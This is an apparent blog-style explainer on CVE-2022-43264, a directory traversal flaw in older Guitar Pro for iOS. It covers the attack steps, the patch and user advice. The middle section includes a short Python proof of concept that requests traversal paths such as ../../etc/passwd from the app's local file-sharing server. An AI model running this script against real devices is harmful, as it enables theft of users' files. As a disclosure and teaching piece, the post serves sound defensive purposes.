CVE-2022-43264 - Exploiting Directory Traversal in Guitar Pro for iOS (Pre-1.10.2)

If you play music and use tablature, you probably know Guitar Pro—a popular app for editing, playing, and sharing tabs. But did you know that earlier versions had a serious security hole? This post explains CVE-2022-43264, a directory traversal vulnerability in Arobas Music Guitar Pro for iPad and iPhone (before v1.10.2), which allowed attackers to download almost any file from your device with a crafty web request. In this article, we’ll break down what happened, how it works, and how attackers could exploit it, all in simple terms.

What is CVE-2022-43264?

CVE-2022-43264 is a vulnerability discovered in the Guitar Pro app for iPad and iPhone, versions before 1.10.2. The problem: the app didn't properly validate the input it got over the network. This allowed attackers to use directory traversal—jumping up directories by inputting sequences like ../..—to grab files they aren’t supposed to access.

Why is This Bad?

Normally, your iPhone or iPad keeps app data isolated. If Guitar Pro exposes a little web server—say, to make sharing easier—it’s supposed to let people access only their own files (for example, their tablature). But with this bug, someone on the same WiFi could ask for any file the app can see, by manipulating the URL. That could include your saved tabs, recordings, or, in some cases, sensitive configuration or keychain files.

Here's the basic process

1. Attacker connects to the same WiFi or local network as an iOS device running a vulnerable version of Guitar Pro.
2. Guitar Pro’s local file sharing feature starts a mini web server (usually at http://<ip>:808 or similar).
3. Attacker crafts a HTTP request to fetch ../../../../... (repeated as needed) to traverse out of the music folder into system directories.
4. If the server doesn't sanitize this path, it serves any file requested, as long as iOS permissions allow.

Code Snippet: Example Exploit in Python

Here’s a simple Python script that demonstrates this vulnerability. It tries to download /etc/passwd for illustration (on Unix/iOS, replace with a real filename):

import requests

# Change this to the victim's device IP and port
target = 'http://192.168.1.5:808';

# Try to fetch a sensitive file by traversing directories
traversal = '../../../../../../../../etc/passwd'
url = f"{target}/files/{traversal}"

response = requests.get(url)

if response.status_code == 200:
    print("File contents:")
    print(response.text)
else:
    print(f"Could not read file. Status: {response.status_code}")

*Note: On actual iOS devices, system files are usually not accessible, but you can replace /etc/passwd with whatever user file you want to grab from the app's sandboxed storage.*

How Was This Fixed?

Arobas Music patched this in Guitar Pro version 1.10.2 (App Store link). The fix tightens input validation, blocking path traversal sequences and only allowing access to intended folders.

References

- NVD Entry for CVE-2022-43264
- Guitar Pro for iOS (iPad & iPhone) App Store
- OWASP Directory Traversal Cheat Sheet

Disable file sharing in Guitar Pro when you don’t need it, especially on public WiFi.

- Stay cautious about installing or running old versions of apps when security updates are available.

In Conclusion

This vulnerability is a classic example of why all developers, including music app creators, need to validate user input before using it in file operations. If you use Guitar Pro, update now to stay safe—and never trust everything on your WiFi!

Timeline

Published on: 11/16/2022 15:15:00 UTC
Last modified on: 11/18/2022 04:43:00 UTC